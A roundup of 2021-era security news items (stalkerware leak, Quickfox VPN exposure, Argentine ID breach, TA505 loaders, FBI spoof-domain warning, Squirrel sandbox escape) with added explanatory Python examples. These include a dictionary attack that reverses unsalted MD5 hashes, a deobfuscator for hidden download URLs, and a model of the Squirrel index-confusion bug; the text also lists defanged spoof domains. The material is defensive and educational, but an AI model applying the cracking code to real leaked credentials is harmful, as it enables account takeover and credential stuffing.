
Thousands of Users Smartphone Data Leaked by a Stalkerware


Hundreds of thousands of users' sensitive phone data is at risk. Because of a security flaw in a widely deployed consumer spyware app, call logs, text messages, pictures, browser history, precise geolocation, and call recordings can be retrieved from affected phones.

TechCrunch repeatedly emailed the developer, whom it has not named, at every public and non-public address it could find, but received no response.

TechCrunch has kept trying to reach the developer because the security and privacy of thousands of people remain at risk until the flaw is fixed. Neither the spyware nor its developer has been identified, since naming them would make it easier for criminals to reach the exposed data.

The vulnerability was found as part of a broader TechCrunch investigation into consumer spyware. These programs, frequently advertised as child-tracking or monitoring software, are also known as "stalkerware" because of their capacity to track and spy on people without their knowledge. Such apps quietly and continuously upload a person's phone contents to whoever installed them, allowing the operator to follow the person's movements and whom they communicate with. Most victims will be unaware that their smartphones have been compromised, because these apps are designed to hide from the home screen to evade discovery and deletion.

TechCrunch also contacted Codero, the web host serving the developer's spyware infrastructure, but the company did not answer repeated requests for comment. Codero is no newcomer to stalkerware hosting; in 2019 the web host "took action" against stalkerware maker Mobiispy after it was found exposing thousands of pictures and audio recordings.

“I’m disappointed, but not even a little surprised,” said Eva Galperin, director of cybersecurity for the Electronic Frontier Foundation. “I think we could reasonably characterize this type of behavior as negligent. Not only do we have a company that is making a product that enables abuse, but they are doing such a poor job of protecting the information that is being exfiltrated that they are opening the targets of this abuse to even greater abuse."

Because this software is so widely and easily available, an industry-wide effort has been launched to combat it. Antivirus companies have worked to improve stalkerware detection, and Google has banned spyware makers from advertising their products as a way to spy on a spouse's phone, but some developers are finding new ways around the ban.

Mobile spyware has a long history of security failures. Over a dozen stalkerware companies, including mSpy, Mobistealth, Flexispy, and Family Orbit, have been hacked or have leaked or exposed data taken from people's phones in recent years.

KidsGuard, another stalkerware, had a security issue that revealed information on thousands of people's phones, and, more recently, pcTattleTale, which advertises itself as competent in spying on a spouse's device, was exposing screenshots via easy-to-guess URL addresses. 

In September the Federal Trade Commission banned SpyFone, a stalkerware app that had also exposed the phone data of over 2,000 users, and required that the owners of affected devices be notified that their phones had been monitored.

One Million Users were Exposed Due to a VPN Provider's Misconfiguration


A misconfigured Elasticsearch server exposed the personally identifiable information (PII) of at least one million users of a Chinese-run VPN provider. According to WizCase, the privacy concern impacts Quickfox, a free VPN used mostly by the Chinese diaspora to access sites that are otherwise inaccessible from outside mainland China. Unfortunately, Fuzhou Zixun Network Technology, the owner of Quickfox, had not properly set up its Elastic Stack security, leaving an Elasticsearch server unprotected and accessible — with no password protection or encryption in place. 

Ata Hakcil led a team of ethical security researchers who discovered a serious leak from Quickfox's Elasticsearch server. The leak was caused not by a software vulnerability but by a misconfiguration of the ELK stack. Elasticsearch, Logstash, and Kibana (ELK) are three open-source components used to ingest, store and search very large volumes of data, such as the logs of an online service like Quickfox.

Quickfox had set up access controls in Kibana, the dashboard front end, but not on the Elasticsearch server itself. Kibana's login protects only the dashboard; a client that talks directly to the Elasticsearch REST API never sees it. As a result, anyone with a browser and an internet connection could query Quickfox's records and extract sensitive information about its users.
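The gap described above, access control on Kibana but none on the Elasticsearch API behind it, is easy to check for in configuration. The following is an added example, not WizCase's or Quickfox's code: it parses the flat key: value lines Elastic config files use and reports the findings a reviewer would raise. The two elasticsearch.yml snippets and the kibana.yml snippet are constructed for illustration; the setting names are the standard Elastic ones.

```python
"""Audit an Elastic Stack configuration for a login on Kibana that is not backed by
authentication on the Elasticsearch REST API.

Added example, not WizCase's or Quickfox's code. The config snippets are constructed.
"""
from typing import Dict, List

# A node bound to one of these addresses is not reachable from the network.
LOCAL_BINDINGS = {"localhost", "127.0.0.1", "::1", "_local_"}


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Parse the flat 'dotted.key: value' lines Elastic config files use.
    Comments and blank lines are skipped; values are unquoted and lower-cased."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip('"').strip("'").lower()
    return settings


def audit_stack(es_yaml: str, kibana_yaml: str) -> List[str]:
    """Return human-readable findings; an empty list means no gap was found."""
    es = parse_flat_yaml(es_yaml)
    kb = parse_flat_yaml(kibana_yaml)
    findings: List[str] = []

    es_auth = es.get("xpack.security.enabled") == "true"
    if not es_auth:
        findings.append("elasticsearch: xpack.security.enabled is not true; "
                        "the REST API answers unauthenticated requests")
    if es.get("xpack.security.http.ssl.enabled") != "true":
        findings.append("elasticsearch: HTTP layer has no TLS; data travels in clear text")
    host = es.get("network.host", "localhost")
    if host not in LOCAL_BINDINGS and not es_auth:
        findings.append(f"elasticsearch: bound to {host} without authentication, "
                        "so anyone who can reach port 9200 can read every index")

    # Kibana's login screen is enforced by Kibana, not by the cluster. If Kibana has
    # credentials configured but the cluster does not require them, the login is cosmetic.
    kb_login = kb.get("xpack.security.enabled", "true") == "true" and "elasticsearch.username" in kb
    if kb_login and not es_auth:
        findings.append("kibana: login is enabled but can be bypassed by querying "
                        "Elasticsearch directly; protect the cluster, not just the dashboard")
    return findings


# Constructed elasticsearch.yml resembling the exposed setup: bound to all interfaces,
# security off. The cluster name is made up.
OPEN_ES_YAML = """
cluster.name: vpn-logs
network.host: 0.0.0.0
http.port: 9200
xpack.security.enabled: false
"""

# Constructed kibana.yml: the dashboard asks for a login, enforced by Kibana alone.
KIBANA_YAML = """
server.host: "0.0.0.0"
elasticsearch.hosts: ["http://localhost:9200"]
elasticsearch.username: "kibana_system"
elasticsearch.password: "redacted-in-example"
"""

# The corrected elasticsearch.yml: authentication and TLS on the HTTP layer turned on.
HARDENED_ES_YAML = """
cluster.name: vpn-logs
network.host: 0.0.0.0
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.transport.ssl.enabled: true
"""

if __name__ == "__main__":
    for label, cfg in (("open", OPEN_ES_YAML), ("hardened", HARDENED_ES_YAML)):
        print(label, audit_stack(cfg, KIBANA_YAML) or ["no findings"])
```

The hardened snippet still needs the keystore and certificate settings that TLS requires; they are omitted here because the point is the authentication gap, not certificate management.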

Around 500 million records totaling over 100 GB of data were exposed. The data fell into two broad categories: the personal information of around 1 million users, and details of the software installed on over 300,000 users' devices. All of the documents found were dated between June 2021 and September 2021.

According to the IP addresses discovered in the breach, it mostly affected individuals in the United States, as well as countries bordering China, such as Japan, Indonesia, and Kazakhstan. 

Customers' emails, IP addresses, phone numbers, device-type identifiers, and MD5-hashed passwords were among the PII exposed. MD5 is far from safe, WizCase noted: it is a fast general-purpose hash, not a password hash, so leaked hashes can be cracked with wordlists and commodity hardware. Even without the passwords, the data would have been enough for criminals to use phishing emails, vishing phone calls, and similar methods to obtain further sensitive information such as credit card or bank account numbers.

“The leaked information about device type and installed software could make this con very convincing,” warned WizCase. “It’s unclear why the VPN was collecting this data, as it is unnecessary for its process and it is not standard practice seen with other VPN services.” 

Criminals could also try to hijack victims' other accounts across the web by cracking the MD5 hashes and replaying the recovered passwords in credential stuffing attacks, WizCase said. It advised consumers to vet VPN providers thoroughly before choosing one and to be aware that free services may profit from collecting and using customer data.
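Why MD5 hashes in a leak are nearly as bad as plaintext, and why credential stuffing follows, is easier to see in code. The following is an added example, not WizCase's code: a wordlist reversal of unsalted MD5 hashes next to the same attack against a salted, iterated hash (PBKDF2). The "leaked" records and the wordlist are constructed; no real Quickfox data is used.

```python
"""Unsalted MD5 versus a salted, iterated password hash under the same dictionary attack.

Added example, not WizCase's code. Records and wordlist are constructed.
"""
import hashlib
import os
from typing import Dict, List, Optional, Tuple


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


# Constructed stand-in for exposed records: (email, MD5 hex of the password).
# Two users share the same weak password and therefore the same hash.
LEAKED_RECORDS: List[Tuple[str, str]] = [
    ("user1@example.com", md5_hex("123456")),
    ("user2@example.com", md5_hex("quickfox2021")),
    ("user3@example.com", md5_hex("123456")),
    ("user4@example.com", md5_hex("correct-horse-battery-staple-9x")),  # not in the wordlist
]

WORDLIST = ["password", "123456", "qwerty", "quickfox2021", "letmein", "iloveyou"]


def crack_md5(records: List[Tuple[str, str]], wordlist: List[str]) -> Dict[str, str]:
    """Reverse unsalted MD5 hashes with a single pass over the wordlist.
    Hashing the wordlist once costs O(len(wordlist)); each record is then a dict lookup,
    so the cost does not grow with the number of users."""
    table = {md5_hex(word): word for word in wordlist}
    return {email: table[h] for email, h in records if h in table}


PBKDF2_ITERATIONS = 100_000  # kept low so the demo runs quickly; production uses more


def pbkdf2_store(password: str) -> str:
    """Salted, iterated hash in a self-describing 'salt$iterations$hash' format."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${PBKDF2_ITERATIONS}${dk.hex()}"


def crack_pbkdf2(stored: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary attack against one PBKDF2 record. The salt is unique per record, so no
    precomputed table helps, and every guess costs a full PBKDF2 run."""
    salt_hex, iterations, dk_hex = stored.split("$")
    for word in wordlist:
        guess = hashlib.pbkdf2_hmac("sha256", word.encode(), bytes.fromhex(salt_hex), int(iterations))
        if guess.hex() == dk_hex:
            return word
    return None


def attack_cost(n_records: int, n_words: int, iterations: int, salted: bool) -> int:
    """Hash evaluations the attacker needs: unsalted means one pass over the wordlist
    for all records; salted means one pass per record, each guess costing `iterations`."""
    return n_words * iterations * (n_records if salted else 1)


if __name__ == "__main__":
    print("MD5 cracked:", crack_md5(LEAKED_RECORDS, WORDLIST))
    print("PBKDF2 weak pw:", crack_pbkdf2(pbkdf2_store("quickfox2021"), WORDLIST))
    print("cost, 1M users, unsalted MD5:", attack_cost(1_000_000, len(WORDLIST), 1, False))
    print("cost, 1M users, PBKDF2:", attack_cost(1_000_000, len(WORDLIST), PBKDF2_ITERATIONS, True))
```

The recovered plaintexts are exactly what credential stuffing tools replay against other services, which is why a leak of MD5 hashes translates into account takeovers elsewhere.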

Hacker Steals Private Details of Thousands of Argentine Citizens


An anonymous hacker has reportedly breached the Argentinian government’s IT network and put up on sale the private details of thousands of Argentineans. 

Last month the hacker targeted Argentina's National Registry of Persons (RENAPER), the agency that issues ID cards to all citizens and stores their data in a database that other government agencies query for citizens' personal information. The agency is a crucial cog in most government lookups of personal data.

According to a report by The Record, the first evidence of the breach surfaced earlier this month on Twitter, when a newly registered account named @AnibalLeaks published ID card photos and personal details of 44 Argentine celebrities, including footballers Lionel Messi and Sergio Aguero and Argentina's president, Alberto Fernandez. The hacker is now evidently looking for a buyer for the personal details of Argentina's entire population.

The leaked data includes names, home addresses, birthdays, Trámite numbers, citizen numbers, government photo IDs, labor identification codes, and ID card issuance and expiration dates. There has been speculation that a VPN account belonging to someone within the Ministry of Health was used to access the Digital Identity System shortly before the Twitter account published the initial data on high-profile Argentines. Law enforcement is currently investigating eight to ten employees for a possible role in the breach.

“The black market for stolen data is big business, and cybercriminals will stop at nothing to find their next big payday. This attack should be a warning to governments: cybercriminals have the means to execute large-scale, sophisticated attacks, and their citizens' data is under threat," said Tony Pepper, CEO of cybersecurity firm Egress.

"With the data of millions at risk, Argentinian citizens are now prime targets for follow-up attacks, such as financial fraud, sophisticated phishing attempts and impersonation scams, aimed at stealing further personal data, identities and even their money." 

According to security experts, this is one of the biggest breaches in Argentina's history, putting the personal details of 45 million people at risk. Cybercrime keeps evolving, and the government will need to strengthen its security controls to protect the integrity of these systems.

TA505 Gang is Back in the Wild


According to enterprise security vendor Proofpoint, TA505, a prolific email-based threat actor, has returned. TA505, which had been largely quiet since 2020, resumed mass-mailing campaigns in September, equipped with new malware loaders and a RAT.

The TA505 cybercrime group has restarted its financially motivated operation, pushing malware at a range of sectors in waves that started small and, researchers noticed, spiked late last month.

The group, which aggressively targets businesses in sectors such as finance, retail, and hospitality, has been active since at least 2014. It is known for rapidly changing its malware and for influencing worldwide trends in criminal malware distribution.

It was responsible for one of the largest spam campaigns Proofpoint has tracked, the distribution of the Dridex banking trojan. Proofpoint has also observed the group delivering the Locky and Jaff ransomware, the Trick banking trojan, and other malware "in very high volumes," according to the company.

As is its habit, the gang's most recent campaigns span a wide range of sectors. They also bring new tools: an updated KiXtart loader, the MirrorBlast loader, which downloads Rebol script stagers, a retooled FlawedGrace RAT, and improved malicious Excel files.

Proofpoint researchers tracked renewed TA505 campaigns that began slowly at the start of September, with only a few thousand emails per wave carrying malicious Excel attachments, and then ramped up later in the month to tens or hundreds of thousands of emails by the end of September, according to the company's analysis.

As per the report, several of the efforts, especially the larger ones, "strongly resemble" what the group was up to between 2019 and 2020, involving identical domain naming patterns, email lures, Excel file lures, and the distribution of the FlawedGrace RAT. TA505 utilized more targeted lures in the early September waves of email attacks, which didn't impact as many sectors as the more recent October 2021 operations, according to Proofpoint experts. 

Significant new advancements include an updated FlawedGrace RAT, as well as retooled intermediate loader phases written in Rebol and KiXtart. According to experts, the gang is utilizing a different downloader than the previously successful Get2 downloader. 

“The new downloaders perform similar functionality of reconnaissance and pulling in the next stages,” Proofpoint researchers noted. 

“The emails contained an Excel attachment that, when opened and macros enabled, would lead to the download and running of an MSI file,” Proofpoint said. MSI files are used to install software on a Windows system. “The MSI file, in turn, would execute an embedded Rebol loader, dubbed by Proofpoint as MirrorBlast.” 

Researchers also discovered that TA505 is now employing numerous intermediary loaders before the distribution of the FlawedGrace RAT, and they are written in unusual scripting languages — Rebol and KiXtart. 

The intermediary loaders appear to fulfill the very same purpose as Get2, a downloader used by TA505 since 2019 to distribute a range of secondary payloads, according to researchers. 

“The loaders perform minimal reconnaissance of an infected machine, such as collecting user domain and username information and downloading further payloads,” according to the research. 

“The code responsible for downloading the next stage MSI file was typically lightly obfuscated with filler characters, string reversing or similar simple functions and hidden in the document Comments, Title, in a Cell or other locations,” the researchers noted. 
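The hiding technique the researchers describe, a next-stage string lightly obfuscated with filler characters or reversed and parked in a document property or cell, can be undone statically during triage. The following is an added example, not TA505's or Proofpoint's code: it tries the inverse transforms against each property value and reports any URL that emerges. The property values are constructed, and the filler heuristic (a character occupying at least a quarter of the positions) is an assumption, since the report does not say which filler characters were used.

```python
"""Recover download URLs hidden in Office document properties by filler insertion
and/or string reversal.

Added example, not TA505's or Proofpoint's code. Property values are constructed.
"""
import re
from collections import Counter
from typing import Dict, Iterator, List, Tuple

# The host must contain a dot, which discards "URLs" produced by stripping '.' from real ones.
URL_RE = re.compile(r"https?://[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+(?::\d+)?(?:/[A-Za-z0-9._/-]*)?")


def candidate_fillers(s: str) -> List[str]:
    """Interleaved filler dominates the character histogram; real URL characters do not.
    The one-quarter threshold is an assumption."""
    return [ch for ch, n in Counter(s).items() if n >= max(1, len(s) // 4)]


def deobfuscate(s: str) -> Iterator[Tuple[str, str]]:
    """Yield (transform, text) pairs: as-is, reversed, and each with a candidate filler removed."""
    variants = [("as-is", s), ("reversed", s[::-1])]
    for filler in candidate_fillers(s):
        stripped = s.replace(filler, "")
        variants.append((f"strip {filler!r}", stripped))
        variants.append((f"strip {filler!r} + reverse", stripped[::-1]))
    seen = set()
    for how, text in variants:
        if text not in seen:
            seen.add(text)
            yield how, text


def extract_hidden_urls(props: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (location, transform, url) for every URL recoverable from the properties."""
    hits: List[Tuple[str, str, str]] = []
    for location, value in props.items():
        for how, text in deobfuscate(value):
            for url in URL_RE.findall(text):
                if not any(loc == location and u == url for loc, _, u in hits):
                    hits.append((location, how, url))
    return hits


def _hide(url: str, filler: str = "", reverse: bool = False) -> str:
    """Build constructed samples the way a macro would expect to undo them."""
    s = filler.join(url) if filler else url
    return s[::-1] if reverse else s


# Constructed document properties; the addresses are documentation ranges, not real C2.
DOC_PROPS = {
    "Title": _hide("http://198.51.100.23/update/setup.msi", filler="x", reverse=True),
    "Comments": _hide("https://files.example.invalid/o/doc.msi", reverse=True),
    "Sheet1!A1": _hide("http://203.0.113.9/s.msi", filler="~"),
    "Subject": "Updated COVID-19 workplace guidance",  # benign decoy text
}

if __name__ == "__main__":
    for location, how, url in extract_hidden_urls(DOC_PROPS):
        print(f"{location:10} {how:22} {url}")
```

The output is a list of candidates for an analyst, not a verdict: a string that happens to decode into something URL-shaped still needs to be checked against the macro that consumes it.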

Considering that TA505 keeps altering its TTPs and is "considered a trendsetter in the world of cybercrime," Proofpoint does not expect the group to go anywhere any time soon. TA505 does not restrict its target set and is an equal-opportunity attacker in terms of the regions and sectors it goes after, researchers said. This, together with its adaptability, focusing on whatever is most profitable and changing its TTPs as needed, makes the actor a persistent threat.

FBI: Fake Government Websites Used to Steal Private & Financial Data


The FBI has alerted the public in the United States that threat actors are actively harvesting sensitive financial and personal information from victims through fraudulent unemployment benefit websites.

The websites used in these attacks are built to look just like official government platforms in order to trick victims into handing over their information, infect them with malware, and claim unemployment benefits in their name.

The federal law enforcement agency stated in a public service announcement published on the Internet Crime Complaint Center's site, "These spoofed websites imitate the appearance of and can be easily mistaken for legitimate websites offering unemployment benefits. The fake websites prompt victims to enter sensitive personal and financial information. Cyber actors use this information to redirect unemployment benefits, harvest user credentials, collect personally identifiable information, and infect victims' devices with malware.”

"In addition to a loss of benefits, victims of this activity can suffer a range of additional consequences, including ransomware infection and identity theft." 

As per the FBI, 385 domains were detected, with eight of them spoofing government sites related to official unemployment benefits platforms. Domain and status are listed below:
  • employ-nv[.]xyz: Active
  • employ-wiscon[.]xyz: Inactive
  • gov2go[.]xyz: Active
  • illiform-gov[.]xyz: Active
  • mary-landgov[.]xyz: Active
  • marylandgov[.]xyz: Inactive
  • newstate-nm[.]xyz: Active
  • newstatenm[.]xyz: Inactive
There is also a possibility that the data obtained through these fake sites will end up in the hands of identity fraudsters, who would use it in different benefit fraud schemes. The US Federal Trade Commission (FTC) reported in February 2021 that the overall number of identity theft reports doubled in 2020 compared to 2019, with 1.4 million reports in a single year. 

The FTC stated, "2020’s biggest surge in identity theft reports to the FTC related to the nationwide dip in employment. After the government expanded unemployment benefits to people left jobless by the pandemic, cybercriminals filed unemployment claims using other people’s personal information." 

For example, the FTC received 394,280 reports of government benefits fraud attempts last year, the majority of which were connected to unemployment benefit identity theft fraud, compared to 12,900 reported in 2019. 

The Internal Revenue Service (IRS) also issued taxpayer guidelines in January on recognizing theft activities involving unemployment payments. The US federal revenue service stated, "The Internal Revenue Service today urged taxpayers who receive Forms 1099-G for unemployment benefits they did not actually get because of identity theft to contact their appropriate state agency for a corrected form." 

"Additionally, if taxpayers are concerned that their personal information has been stolen and they want to protect their identity when filing their federal tax return, they can request an Identity Protection Pin (IP PIN) from the IRS." 

The FBI also offered advice on how to protect yourself against this kind of identity theft; a few points are listed below:
  • Check the spelling of web addresses carefully; the spoofed domains above differ from the real state sites by a character, a hyphen, or the top-level domain.
  • Check that the website has a valid SSL/TLS certificate.
  • Keep software up to date.
  • Use two-factor authentication wherever it is offered.
  • Be wary of unsolicited emails, and do not follow links in them to claim benefits.
A caveat on the second point: a certificate confirms that you are talking to the domain shown in the address bar, not that the domain is legitimate. Fraudulent .xyz sites obtain certificates as easily as anyone else, so the padlock is no substitute for checking that the address actually ends in .gov.
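The "check the spelling" advice can be turned into a screening rule for the pattern the eight domains above share: a government or benefit keyword, often with a state name or abbreviation, in a domain that is not under the .gov namespace real US state unemployment sites use. The following is an added example, not the FBI's tooling; the keyword list, the state tables and the scoring are assumptions, and the output is a triage hint rather than a verdict.

```python
"""Screen defanged or plain domains for the government look-alike pattern.

Added example, not the FBI's tooling. Keyword and state tables are assumptions.
"""
import re
from typing import List

GOV_TLDS = {"gov", "mil"}
KEYWORDS = ("gov", "employ", "benefit", "claim", "state")
STATE_ABBR = set("""al ak az ar ca co ct de fl ga hi id il in ia ks ky la me md ma mi mn ms mo
mt ne nv nh nj nm ny nc nd oh ok or pa ri sc sd tn tx ut vt va wa wv wi wy""".split())
STATE_NAMES = """alabama alaska arizona arkansas california colorado connecticut delaware florida
georgia hawaii idaho illinois indiana iowa kansas kentucky louisiana maine maryland massachusetts
michigan minnesota mississippi missouri montana nebraska nevada newhampshire newjersey newmexico
newyork northcarolina northdakota ohio oklahoma oregon pennsylvania rhodeisland southcarolina
southdakota tennessee texas utah vermont virginia washington westvirginia wisconsin wyoming""".split()


def defang_to_domain(raw: str) -> str:
    """Normalise 'hxxps://Gov2go[.]xyz/path' or 'gov2go[.]xyz' to 'gov2go.xyz'."""
    s = raw.strip().lower().replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"^(?:hxxps?|https?)://", "", s)
    return s.split("/", 1)[0]


def state_evidence(name: str) -> List[str]:
    """Find a state abbreviation, a state name, or a prefix of one inside the name labels."""
    tokens = [t for t in re.split(r"[-.]", name) if t]
    found = [f"state abbreviation token '{t}'" for t in tokens if t in STATE_ABBR]
    if not found and name[-2:] in STATE_ABBR:  # catches run-together names like newstatenm
        found.append(f"ends with state abbreviation '{name[-2:]}'")
    found += [f"state name '{s}'" for s in STATE_NAMES if s in name]
    found += [f"token '{t}' is a prefix of a state name" for t in tokens
              if len(t) >= 4 and t not in STATE_NAMES and any(s.startswith(t) for s in STATE_NAMES)]
    return found


def lookalike_reasons(raw: str) -> List[str]:
    """Return reasons a domain looks like a spoofed government site; empty means not flagged.
    Real .gov/.mil domains and names without a benefit keyword are never flagged."""
    domain = defang_to_domain(raw)
    labels = domain.split(".")
    tld = labels[-1]
    if tld in GOV_TLDS or len(labels) < 2:
        return []
    name = ".".join(labels[:-1])
    hits = [k for k in KEYWORDS if k in name]
    if not hits:
        return []
    reasons = [f"keyword(s) {hits} in a .{tld} domain rather than .gov"]
    return reasons + state_evidence(name)


FBI_LISTED = ["employ-nv[.]xyz", "employ-wiscon[.]xyz", "gov2go[.]xyz", "illiform-gov[.]xyz",
              "mary-landgov[.]xyz", "Marylandgov[.]xyz", "newstate-nm[.]xyz", "Newstatenm[.]xyz"]

if __name__ == "__main__":
    for d in FBI_LISTED + ["labor.ny.gov", "facebook.xyz"]:
        print(defang_to_domain(d), lookalike_reasons(d) or "not flagged")
```

Because flagging requires a keyword, a bare state name under an odd TLD is not reported; that trade-off keeps the rule quiet on ordinary commercial domains at the cost of missing lures that avoid the obvious words.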

Russian oil companies offer to use their fields for mining cryptocurrencies

Russian oil companies have offered to use Russian equipment at their fields for mining cryptocurrencies. They propose burning associated petroleum gas (APG) to generate the electricity for the data centers that mining requires. The project has been sent for consideration to the Ministry of Industry and Trade, the Ministry of Digital Development, Communications and Mass Media, and the Central Bank of the Russian Federation.

It is reported that one of the major Russian oil companies would like to scale its cryptocurrency mining project, but this segment is in a legally gray zone, and the company is afraid of a negative reaction from the Central Bank, so it turned to the Ministry of Industry and Trade, which can discuss the risks with the regulator.

The Ministry of Industry and Trade reported that the project is being discussed with regulators. In accordance with the law “On Digital Financial Assets”, the procedure for the circulation of digital currency should be regulated by separate laws. According to the Central Bank, approaches to regulation are currently being discussed.

Experts consider the proposal controversial. On the one hand, there is the gas that is unprofitable for transportation, from which electricity can be obtained. On the other hand, this business is non-core and costly for oil companies, since they will have to pay for the maintenance of data centers.

Although there is no legal ban on mining in Russia, cryptocurrency cannot be exchanged or used as a means of payment. Therefore, according to experts, it is possible that oil companies will provide excess capacity for investors from China, where mining is prohibited.

It is worth noting that officially only Gazprom Neft has a mining project: in 2020 the company launched one at a field in the Khanty-Mansiysk region. In one month the company's partners mined 1.8 BTC. Gazprom Neft declined to comment.

Attackers Could Use a Bug in the Squirrel Engine to Hack Games and Cloud Services


An out-of-bounds read vulnerability in the Squirrel programming language allows attackers to escape the sandbox of a Squirrel virtual machine (VM) and execute arbitrary code on the host, giving them complete control of the underlying machine. Given where Squirrel is used, in games and embedded in Internet of Things (IoT) devices, the bug could endanger the millions of monthly players of games like Counter-Strike: Global Offensive and Portal 2, as well as cloud services like Twilio's Electric Imp IoT platform, which ships a ready-to-use open-source library.

The issue is tracked as CVE-2021-41556 and affects the stable 3.x and 2.x release branches of Squirrel. It is exploitable whenever Squirrel is used to execute untrusted scripts, as game engines that embed it do for community content. The vulnerability was responsibly disclosed on August 10, 2021.

Squirrel is an open-source object-oriented programming language used for customization and plugin development in video games and cloud applications. It's a scripting language that fits the size, memory bandwidth, and real-time demands of video games and embedded systems. 

"In a real-world scenario, an attacker could embed a malicious Squirrel script into a community map and distribute it via the trusted Steam Workshop," researchers Simon Scannell and Niklas Breitfeld said in a report. "When a server owner downloads and installs this malicious map onto his server, the Squirrel script is executed, escapes its VM, and takes control of the server machine." 

The security problem is "out-of-bounds access via index confusion" when defining Squirrel classes. Because bit flags are packed into the same integer as member indexes, the researchers explained, it is entirely feasible for an attacker to construct a class definition with 0x02000000 methods, at which point a method's index collides with the flag bits and the lookup misinterprets it.

The flaw is severe because it lets a malicious script craft a fake array through which it can read and write values outside the intended bounds. The researchers found that overwriting function pointers allowed them to "hijack the control flow of the program and take full control of the Squirrel VM."
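The mechanics of an index colliding with a flag bit are easier to follow in a small model. The following is an added example that uses the 0x02000000 figure from the report; it is not Squirrel's source, and the flag values, the 24-bit index mask and the two-table layout are assumptions chosen so that the reported method count triggers the collision. It shows the confusion and the check that prevents it.

```python
"""Model of "index confusion": a member handle packs a type flag and an array index into one
integer. Once the method counter reaches the value of the FIELD flag, the handle for that
method decodes as "field 0", and the lookup hands back the wrong kind of object from the
wrong table. Code that trusts the decoded index then reads out of bounds.

Added example, not Squirrel's code. Flag values, mask width and layout are assumptions.
"""
from typing import Dict, Tuple

METHOD_FLAG = 0x01000000
FIELD_FLAG = 0x02000000
INDEX_MASK = 0x00FFFFFF  # assumed: 24 bits of index below the flag bits


def encode(flag: int, index: int) -> int:
    """Pack a handle. Nothing checks that `index` fits under INDEX_MASK: that is the bug."""
    return flag | index


def decode(handle: int) -> Tuple[str, int]:
    """Unpack a handle. The FIELD bit decides which table the index is applied to."""
    kind = "field" if handle & FIELD_FLAG else "method"
    return kind, handle & INDEX_MASK


class ClassDef:
    """Member handles for a class under definition. `method_count` lets a test start from a
    class that already declares many methods without materializing them."""

    def __init__(self, method_count: int = 0, strict: bool = False):
        self.method_count = method_count
        self.fields: Dict[int, str] = {0: "first_field"}
        self.methods: Dict[int, str] = {}
        self.strict = strict  # hardened behaviour: refuse indexes that overlap the flags

    def add_method(self, name: str) -> int:
        index = self.method_count
        if self.strict and index > INDEX_MASK:
            raise ValueError("too many methods: index would overlap the flag bits")
        self.method_count += 1
        self.methods[index] = name
        return encode(METHOD_FLAG, index)

    def lookup(self, handle: int) -> Tuple[str, int, str]:
        kind, index = decode(handle)
        table = self.fields if kind == "field" else self.methods
        return kind, index, table.get(index, "<out of bounds>")


def demonstrate_confusion() -> Tuple[str, int, str]:
    """A class that already declares 0x02000000 methods adds one more; the handle for it
    has the FIELD bit set and index 0, so the lookup returns a field, not the method."""
    cls = ClassDef(method_count=FIELD_FLAG)
    handle = cls.add_method("attacker_method")
    return cls.lookup(handle)


def demonstrate_fix() -> bool:
    """Same scenario with the bound enforced: the definition is rejected before any
    handle can collide with the flag bits."""
    try:
        ClassDef(method_count=FIELD_FLAG, strict=True).add_method("attacker_method")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable lookup:", demonstrate_confusion())
    print("hardened rejects:", demonstrate_fix())
```

In a memory-unsafe VM the "<out of bounds>" placeholder above is instead a read from whatever sits past the fields table, which is the primitive the researchers built their fake array on.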

Although the problem was fixed in a code commit on September 16, the change has not yet shipped in a new stable release; the most recent official version, v3.1, dates from March 27, 2016. Maintainers who embed Squirrel in their projects should apply the fix commit to protect themselves from attack, according to the researchers who found the issue.

Chinese Researchers Hack iPhone 13 Pro in Record Time


Cyber security researchers from China won $1.88 million after hacking some of the world’s most popular software at the annual Tianfu Cup, the fourth edition of the international hacking contest held in the city of Chengdu, China. 

The Tianfu Cup is similar to Pwn2Own: participants are rewarded for exploiting vulnerabilities in widely used software and hardware. It was created after Chinese government rules restricted the country's researchers from taking part in international hacking competitions. The first edition was held in autumn 2018, when security researchers successfully hacked Edge, Chrome, Safari, iOS, Xiaomi and Vivo phones, VirtualBox, and other targets.

This year's edition took place over the weekend of October 16 and 17. The Kunlun Lab team, whose CEO is a former CTO of Qihoo 360, hacked an iPhone 13 Pro running a fully patched iOS 15.0.2 in record time, live on stage, using a remote code execution exploit against the mobile Safari web browser. Kunlun Lab wasn't the only team to hack the iPhone 13 Pro: Team Pangu, which has a history of jailbreaking Apple devices, also compromised a fully patched iPhone 13 Pro running iOS 15, taking a few minutes longer.

The other targets included Google Chrome operating on Windows 10 21H1, Adobe PDF Reader, Docker CE, Ubuntu 20/CentOS 8, Microsoft Exchange Server 2019, Windows 10, VMware Workstation, VMware ESXi, Parallels Desktop, Apple Safari running on Macbook Pro, iPhone 13 Pro running iOS 15, domestic mobile phones running Android, QEMU VM, Synology DS220j DiskStation, and ASUS RT-AX56U router. 

The contest consisted of three independent, parallel competitions (PC, mobile, and server) and eight categories: virtualization software, operating system software, browser software, office software, mobile smart devices, web services and applications software, DNS service software, and common management services software.

The hacking competition also included a separate trade show and cybersecurity conference, which this year was presented by Qi Xiangdong, chairman of security firm QiAnXin, and also included sections dedicated to smart vehicle security, IoT security, artificial intelligence security, and smart city security.

Hiding ATM Pad Gives Less Protection Against Attackers: States Research


When withdrawing cash from an ATM with a debit or credit card, users must enter their PIN. A careful individual shields the keypad with one hand while typing so that nobody can see the PIN, but researchers have shown that even then the PIN can be predicted with good accuracy using a machine learning technique.

Recent research has shown that a special-purpose deep-learning model can be trained to predict 4-digit card PINs 41% of the time, even when the victim shields the keypad with the other hand. The attack requires building a replica of the target ATM, since training the model on the exact size and key spacing of the specific PIN pad is critical.

